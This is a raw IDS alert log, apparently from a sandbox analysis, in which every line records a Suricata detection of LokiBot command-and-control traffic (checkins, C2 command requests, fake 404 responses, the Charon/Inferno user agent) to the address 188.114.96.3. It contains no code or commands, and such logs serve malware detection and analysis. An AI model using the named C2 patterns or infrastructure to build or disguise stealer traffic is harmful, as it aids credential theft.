Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50019 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50010 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50048 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50041 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50013 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49806
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50030 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50013 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50042 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50042 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50030 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50044 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50038 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50035 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50039 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50035 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49881 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50039 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50027 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50038 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49881 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50048 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50010 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50023 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50023 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50024 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50024 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50002 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50048 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50002 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50048 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50019
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50024 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50048
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50036 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50036 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50046
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50036 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49925 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49925 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50044 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50013
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49990 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49990 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50041 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50041 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50038 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50030 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50030 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49745 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50027
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50022 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49745 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50022 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50022 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49976 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49976 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49976 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49866 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49866 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50022 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49866 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50022 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49980 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50031 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50031 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50031 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49866 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50041 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50041 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50031 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49983
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50031 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50024 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50036 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49980 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49980 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50035
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49745 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49832
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50022
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49866 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50043 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50043 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50043 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49976 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50002
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50041
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50039
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50036 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50043 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49881
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50037 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49990
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50010
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49866
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50038
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50031
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50044
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49980
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50036
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50037 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50030
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50037 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49745
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49976 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50042
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50047 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50043 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50047 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50047 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49925
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50024
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50028 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50034 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50037 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50037 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50047 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50028 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50028 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50034 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50025 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50025 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49907 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49976
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50034 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50047 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50028 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50043
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50025 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50028 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50037
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50023
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49820
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49907 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50025 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50025 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49907 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50034 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50028
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50034 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50025
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50029 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50029 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50029 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50033 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50033 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50033 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50029 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50034
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50029 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50032 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50029
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50032 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50033 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50032 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50033 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49907 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50047
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50040 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50045 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50040 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50032 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49907 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50040 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50032 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50045 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50026 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50026 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50026 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50045 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50033
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50026 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50026 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50045 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50040 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49907
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50045 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50032
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50040 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50026
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50045
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50040
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49987 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49987 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49987 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49987 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49987 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49987
